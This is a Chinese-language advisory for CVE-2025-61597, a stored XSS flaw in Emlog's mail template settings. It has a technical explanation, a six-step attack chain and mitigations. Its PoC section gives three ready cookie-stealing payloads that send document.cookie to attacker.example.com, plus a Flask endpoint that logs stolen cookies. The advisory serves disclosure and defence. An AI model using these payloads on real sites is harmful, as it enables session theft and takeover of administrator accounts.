CVE-2025-61597：Emlog邮件模板存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-61597

漏洞类型

存储型跨站脚本攻击（Stored XSS）/ HTML模板注入

CVSS评分

7.6 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Emlog 开源网站建设系统

漏洞概述

CVE-2025-61597是Emlog开源网站建设系统中存在的一个高危存储型跨站脚本（XSS）漏洞，影响版本2.5.21及以下。该漏洞源于邮件模板设置功能中缺乏对用户输入内容的充分过滤与转义处理，攻击者可以将恶意的HTML/JavaScript代码注入到邮件模板字段中并持久化存储。由于该注入内容存储在服务器端，每当已认证的管理员访问邮件模板设置页面时，浏览器会自动解析并执行其中嵌入的恶意JavaScript代码。攻击者可利用此漏洞窃取管理员的会话Cookie、CSRF令牌或其他敏感凭据，进而实现对目标站点的完整管理员账户接管。由于Emlog广泛应用于个人博客及中小型网站的管理后台，该漏洞对网站运营者的数据安全和账户安全构成严重威胁。该漏洞已在2.5.22版本中修复，官方通过PR #179提交了安全补丁，建议所有受影响用户尽快升级。

技术细节

该漏洞的核心成因在于Emlog邮件模板设置模块在处理用户提交的模板内容时，未对HTML标签和JavaScript代码进行适当的过滤、转义或净化处理，直接将用户输入的内容渲染到管理后台页面中。具体而言，当管理员在邮件模板设置页面编辑模板内容时，攻击者（可能通过社工手段诱导管理员或在已获得低权限账户的情况下）可在模板字段中注入形如`<script>alert(document.cookie)</script>`或`<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>`的恶意载荷。由于后端未对输入进行安全过滤，该载荷被持久化保存至数据库中。随后，任何访问该设置页面的管理员用户，其浏览器将自动执行注入的恶意脚本。攻击者可利用JavaScript的同源策略绕过机制，通过`document.cookie`窃取会话令牌，或通过`fetch`/`XMLHttpRequest`向攻击者控制的服务器外泄敏感信息。更为严重的是，攻击者可在管理员上下文中执行任意操作，如创建新的管理员账户、修改站点配置、上传Webshell等，最终实现对目标站点的完全控制。CVSS评分7.6反映了该漏洞利用门槛低（仅需低权限和用户交互）但危害程度高（机密性和完整性影响均为高）。

攻击链分析

STEP 1

步骤1：获取初始访问权限

攻击者通过钓鱼、社工或其他方式获取Emlog站点的低权限账户（如作者、编辑角色），或诱导管理员执行特定操作。

STEP 2

步骤2：定位注入点

攻击者登录后访问管理后台的邮件模板设置页面，识别出模板内容字段未对HTML/JS进行过滤，可作为XSS注入点。

STEP 3

步骤3：注入恶意载荷

攻击者在邮件模板内容字段中插入恶意的JavaScript代码（如窃取Cookie的脚本），并保存设置。由于后端未做过滤，载荷被持久化存储。

STEP 4

步骤4：等待管理员触发

当已认证的管理员用户访问邮件模板设置页面时，浏览器自动渲染并执行存储的恶意JavaScript代码。

STEP 5

步骤5：窃取敏感信息

恶意脚本在管理员浏览器上下文中执行，窃取会话Cookie、CSRF令牌等敏感信息并外泄至攻击者控制的服务器。

STEP 6

步骤6：劫持管理员账户

攻击者利用窃取的会话令牌冒充管理员登录后台，执行任意管理操作，包括创建新管理员、修改配置、上传Webshell等，实现完全控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-61597 PoC: Stored XSS via Emlog Mail Template Settings -->
<!-- Attack vector: Inject malicious payload into mail template content field -->

<!-- Step 1: Authenticate as a user with access to mail template settings -->
<!-- Step 2: Navigate to the mail template settings page -->
<!-- Step 3: Inject the following payload into the template content field -->

<!-- Payload 1: Basic cookie stealing -->
<script>
  var img = new Image();
  img.src = 'https://attacker.example.com/steal?cookie=' + encodeURIComponent(document.cookie);
</script>

<!-- Payload 2: Using img onerror event handler (more stealthy) -->
<img src="x" onerror="fetch('https://attacker.example.com/steal?c='+document.cookie)">

<!-- Payload 3: Using SVG with onload -->
<svg onload="new Image().src='https://attacker.example.com/x?'+document.cookie">

<!-- Step 4: Save the template -->
<!-- Step 5: Wait for an admin to visit the mail template settings page -->
<!-- Step 6: The malicious JavaScript executes in the admin's browser context -->
<!-- Step 7: Admin's session cookie/token is exfiltrated to attacker's server -->

<!-- Attacker server endpoint (e.g., Flask) to capture stolen cookies -->
// from flask import Flask, request
// app = Flask(__name__)
// @app.route('/steal')
// def steal():
//     cookie = request.args.get('c') or request.args.get('cookie')
//     with open('stolen_cookies.txt', 'a') as f:
//         f.write(cookie + '\n')
//     return ''
// app.run()

影响范围

Emlog <= 2.5.21

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制邮件模板设置功能的访问权限，仅允许受信任的管理员操作；2）在Web应用防火墙（WAF）中添加针对管理后台的XSS过滤规则；3）为所有管理员Cookie启用HttpOnly标志，阻止JavaScript窃取会话；4）部署Content Security Policy（CSP）头，限制内联脚本执行；5）监控管理后台的异常访问和配置变更行为；6）定期轮换管理员密码和会话令牌。